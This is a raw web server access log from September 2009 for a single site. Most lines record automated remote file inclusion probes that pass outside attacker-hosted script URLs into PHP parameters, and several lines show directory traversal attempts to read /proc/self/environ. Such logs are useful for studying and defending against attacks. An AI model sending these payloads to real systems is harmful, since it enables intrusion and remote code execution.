212.98.171.91 - - [16/Sep/2009:10:31:17 -0700] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:31:24 -0700] "GET /logs/access_080819.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:31:26 -0700] "GET /logs/access_081017.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:31:32 -0700] "GET /logs/access_081017.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:31:44 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 117498 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:31:44 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 19918 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:31:45 -0700] "GET /logs/access_090803.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:32:09 -0700] "GET /logs/access_090901.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:32:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:32:09 -0700] "GET /phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:32:15 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:32:17 -0700] "GET /logs/access_080812.log%20//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:32:20 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:32:30 -0700] "GET /logs/access_080515.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:32:32 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:32:33 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 200 19847 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:32:38 -0700] "GET /logs/access_080313.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:32:55 -0700] "GET /logs/access_080313.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:33:06 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:33:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:33:06 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:33:07 -0700] "GET /logs/access_081017.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:34 -0700] "GET /logs/access_090427.log%20%20///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:34 -0700] "GET /logs///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:35 -0700] "GET //index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 19779 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:45 -0700] "GET /logs///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:46 -0700] "GET //index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 19779 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:33:46 -0700] "GET /logs/access_090427.log%20%20///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:34:08 -0700] "GET /logs/access_080819.log%20%20/phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:34:08 -0700] "GET /logs/access_080615.log%20%20/phphtml.php?htmlclass_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [16/Sep/2009:10:35:29 -0700] "GET /logs/access_081111.log//?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [16/Sep/2009:10:35:29 -0700] "GET /logs//?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [16/Sep/2009:10:35:29 -0700] "GET /?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 200 19885 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:35:32 -0700] "GET /logs/access_090731.log//html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:35:32 -0700] "GET /logs//html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:35:32 -0700] "GET /html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:35:32 -0700] "GET /logs/access_081104.log HTTP/1.0" 200 3319794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:35:41 -0700] "GET /logs/access_081026.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:35:48 -0700] "GET /logs/access_090518.log//html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:35:52 -0700] "GET /logs/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:35:52 -0700] "GET /errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:35:53 -0700] "GET /logs/access_080416.log%20%20/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [16/Sep/2009:10:36:01 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [16/Sep/2009:10:36:01 -0700] "GET /config.php?path_to_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.24 - - [16/Sep/2009:10:36:01 -0700] "GET /logs/config.php?path_to_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:36:03 -0700] "GET /logs/access_080614.log%20%20/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:36:10 -0700] "GET /logs/access_071004.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:36:19 -0700] "GET /logs/access_090219.log HTTP/1.0" 200 8393124 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.53.250.24 - - [16/Sep/2009:10:36:20 -0700] "GET /logs/access_080228.log/config.php?path_to_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:36:46 -0700] "GET /logs/access_080313.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:36:46 -0700] "GET /logs/access_090731.log%20%20//html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:36:57 -0700] "GET /logs/access_090518.log%20%20//html/index.php?phpbb_root_path=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:07 -0700] "GET /logs/access_090520.log//errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:07 -0700] "GET /logs//errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:07 -0700] "GET /errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:12 -0700] "GET /logs/access_080623.log//errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:37:14 -0700] "GET /logs//index2.php?page=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:23 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:23 -0700] "GET /logs//include.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:37:23 -0700] "GET /include.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:38:09 -0700] "GET /logs/access_090520.log%20%20//errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:38:09 -0700] "GET /logs/access_080623.log%20%20//errors.php?error=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.39.159 - - [16/Sep/2009:10:38:16 -0700] "GET /logs/access_090508.log//?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:38:34 -0700] "GET /logs/access_090213.log//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:38:34 -0700] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117500 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:38:35 -0700] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:38:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:38:48 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:38:52 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:38:55 -0700] "GET /logs/access_081017.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:39:01 -0700] "GET /logs/access_080313.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:39:11 -0700] "GET /logs/access_080502.log%20%20//include.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:25 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:25 -0700] "GET /logs/access_080403.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:28 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 200 19848 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:29 -0700] "GET /logs/access_080403.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:29 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:39:30 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 200 19848 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:39:35 -0700] "GET /logs/access_080603.log HTTP/1.0" 200 3548638 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:39:35 -0700] "GET /logs/access_080823.log%20%20//include.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:39:47 -0700] "GET /logs/access_090604.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:39:47 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:39:47 -0700] "GET /errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:39:47 -0700] "GET /logs/access_081126.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:39:57 -0700] "GET /logs//index.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:40:21 -0700] "GET /logs/access_081126.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:40:21 -0700] "GET /logs/access_090604.log/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:40:21 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:40:21 -0700] "GET /errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:40:52 -0700] "GET /logs/access_090515.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:10:40:55 -0700] "GET /logs/access_090515.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:18 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:18 -0700] "GET /logs/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:18 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:42:21 -0700] "GET /logs/access_090604.log%20%20/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:10:42:21 -0700] "GET /logs/access_081126.log%20%20/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:21 -0700] "GET /logs/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:21 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:21 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:42 -0700] "GET /logs/access_081209.log/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:42:42 -0700] "GET /logs/access_090804.log%20%20/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.213.195.133 - - [16/Sep/2009:10:42:43 -0700] "GET /logs/access_081126.log%20%20/errors.php?error=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:42:48 -0700] "GET /logs/access_081209.log/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:42:48 -0700] "GET /ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:42:48 -0700] "GET /logs/access_071228.log//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:42:48 -0700] "GET /logs//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:43:07 -0700] "GET /logs/access_081017.log//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:43:16 -0700] "GET /logs/access_080501.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:43:16 -0700] "GET /logs/access_080828.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:43:17 -0700] "GET /logs/access_080501.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:43:17 -0700] "GET /logs/access_080828.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:22 -0700] "GET /logs/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:22 -0700] "GET /template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:22 -0700] "GET /logs/access_090507.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:25 -0700] "GET /logs/access_090507.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:25 -0700] "GET /template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:25 -0700] "GET /logs/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:26 -0700] "GET /logs/access_090124.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:43:28 -0700] "GET /logs/access_090124.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:10:44:19 -0700] "GET /logs/access_080912.log%20//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:10:44:19 -0700] "GET /logs//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:10:44:19 -0700] "GET /logs/access_080912.log%20//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:10:44:19 -0700] "GET /logs//index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
205.234.246.98 - - [16/Sep/2009:10:44:19 -0700] "GET /index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 19822 "-" "-" "www.dmulk.com"
